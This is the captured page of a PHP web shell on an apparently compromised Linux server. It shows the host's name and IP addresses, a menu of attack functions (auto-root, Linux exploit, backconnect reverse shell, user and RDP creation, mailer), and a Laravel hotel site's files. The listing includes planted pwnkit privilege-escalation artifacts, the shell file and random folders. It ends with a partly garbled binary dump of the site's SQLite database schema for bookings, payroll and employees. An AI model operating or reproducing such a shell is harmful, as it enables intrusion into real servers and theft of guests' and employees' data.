Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.78
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo12.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxr-xr-x
.claude
[ DIR ]
drwxr-xr-x
.git
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cgmdikp
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
ephkgru
[ DIR ]
drwxr-xr-x
f1zvuil
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
lzxcgtj
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
sxnqmah
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
wcmbhvx
[ DIR ]
drwxr-xr-x
xiwovuf
[ DIR ]
drwxr-xr-x
zwraykm
[ DIR ]
drwxr-xr-x
.env
753
B
-rw-rw-rw-
.env.example
558
B
-rw-rw-rw-
.htaccess
1.96
KB
-r--r--r--
.mad-root
0
B
-rw-r--r--
artisan
339
B
-rw-rw-rw-
composer.json
1.72
KB
-rw-rw-rw-
composer.lock
214.87
KB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
index.php
20.13
KB
-r--r--r--
license-tnzl.php
629
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
86
B
-rw-r--r--
serve-hbms.bat
230
B
-rwxrwxrwx
server.php
216
B
-rw-rw-rw-
signgwph_application
72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : signgwph_application
SQLite format 3 @ .,P � � � ��~:�� @ � 2026_07_09_000006_create_transactions_and_audit_logs_tables9 w 2026_07_09_000005_create_employees_and_payroll_tablesB � 2026_07_09_000004_create_services_and_service_bookings_tables+ [ 2026_07_09_000003_create_bookings_table( U 2026_07_09_000002_create_rooms_table) W 2026_07_09_000001_create_hotels_table � � !migrations X Y � osX�< � � ] �)_�cindexbookings_room_id_check_in_check_out_indexbookings CREATE INDEX "bookings_room_id_check_in_check_out_index" on "bookings" ("room_id", "check_in", "check_out")��ktablebookingsbookingsCREATE TABLE "bookings" ("id" integer primary key autoincrement not null, "hotel_id" integer not null, "room_id" integer not null, "reference" varchar not null, "guest_name" varchar not null, "guest_email" varchar not null, "check_in" date not null, "check_out" date not null, "guests" integer not null, "source" varchar not null default 'direct', "status" varchar not null default 'reserved', "room_total" numeric not null default '0', "service_total" numeric not null default '0', "tax_total" numeric not null default '0', "grand_total" numeric not null default '0', "created_at" datetime, "updated_at" datetime, foreign key("hotel_id") references "hotels"("id") on delete cascade, foreign key("room_id") references "rooms"("id") on delete restrict)^/�indexrooms_slug_uniqueroomsCREATE UNIQUE INDEX "rooms_slug_unique" on "rooms" ("slug")�y�QtableroomsroomsCREATE TABLE "rooms" ("id" integer primary key autoincrement not null, "hotel_id" integer not null, "number" varchar, "name" varchar not null, "slug" varchar not null, "type" varchar not null, "max_guests" integer not null, "base_price" numeric not null, "status" varchar not null default 'ready', "floor" varchar, "amenities" text, "photos" text, "description" text, "created_at" datetime, "updated_at" datetime, foreign key("hotel_id") references "hotels"("id") on delete cascade)b1�indexhotels_slug_uniquehotelsCREATE UNIQUE INDEX "hotels_slug_unique" on "hotels" ("slug")�1�=tablehotelshotelsCREATE TABLE "hotels" ("id" integer primary key autoincrement not null, "name" varchar not null, "slug" varchar not null, "email" varchar, "phone" varchar, "address" varchar, "currency" varchar not null default 'USD', "policies" text, "created_at" datetime, "updated_at" datetime)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)�$!!�tablemigrationsmigrationsCREATE TABLE "migrations" ("id" integer primary key autoincrement not null, "migration" varchar not null, "batch" integer not null) \ � �� �{�\ �}!!�Etableaudit_logsaudit_logsCREATE TABLE "audit_logs" ("id" integer primary key autoincrement not null, "hotel_id" integer, "actor_name" varchar, "action" varchar not null, "auditable_type" varchar not null, "auditable_id" integer, "before" text, "after" text, "created_at" datetime, "updated_at" datetime, foreign key("hotel_id") references "hotels"("id") on delete set null)�%%�{tabletransactionstransactionsCREATE TABLE "transactions" ("id" integer primary key autoincrement not null, "hotel_id" integer not null, "booking_id" integer, "payroll_record_id" integer, "method" varchar not null, "provider_reference" varchar, "amount" numeric not null, "currency" varchar not null default 'USD', "status" varchar not null default 'pending', "processed_at" datetime, "created_at" datetime, "updated_at" datetime, foreign key("hotel_id") references "hotels"("id") on delete cascade, foreign key("booking_id") references "bookings"("id") on delete set null, foreign key("payroll_record_id") references "payroll_records"("id") on delete set null)�% ++�tablepayroll_recordspayroll_recordsCREATE TABLE "payroll_records" ("id" integer primary key autoincrement not null, "employee_id" integer not null, "period_start" date not null, "period_end" date not null, "gross_amount" numeric not null, "adjustments" numeric not null default '0', "net_amount" numeric not null, "method" varchar not null default 'bank', "status" varchar not null default 'pending', "paid_at" datetime, "created_at" datetime, "updated_at" datetime, foreign key("employee_id") references "employees"("id") on delete cascade)�� tableemployeesemployees CREATE TABLE "employees" ("id" integer primary key autoincrement not null, "hotel_id" integer not null, "name" varchar not null, "email" varchar, "phone" varchar, "role" varchar not null, "department" varchar not null, "employment_type" varchar not null default 'monthly', "salary_amount" numeric not null default '0', "hired_at" date, "status" varchar not null default 'active', "documents" text, "created_at" datetime, "updated_at" datetime, foreign key("hotel_id") references "hotels"("id") on delete cascade)�--�ktableservice_bookingsservice_bookingsCREATE TABLE "service_bookings" ("id" integer primary key autoincrement not null, "service_id" integer not null, "booking_id" integer, "guest_name" varchar, "starts_at" datetime, "quantity" integer not null default '1', "total" numeric not null default '0', "status" varchar not null default 'reserved', "created_at" datetime, "updated_at" datetime, foreign key("service_id") references "services"("id") on delete cascade, foreign key("booking_id") references "bookings"("id") on delete cascade)� �tableservicesservicesCREATE TABLE "services" ("id" integer primary key autoincrement not null, "hotel_id" integer not null, "name" varchar not null, "type" varchar, "price" numeric not null default '0', "capacity" integer, "operating_hours" text, "is_active" tinyint(1) not null default '1', "created_at" datetime, "updated_at" datetime, foreign key("hotel_id") references "hotels"("id") on delete cascade)y ?�#indexbookings_reference_uniquebookings CREATE UNIQUE INDEX "bookings_reference_unique" on "bookings" ("reference")
Close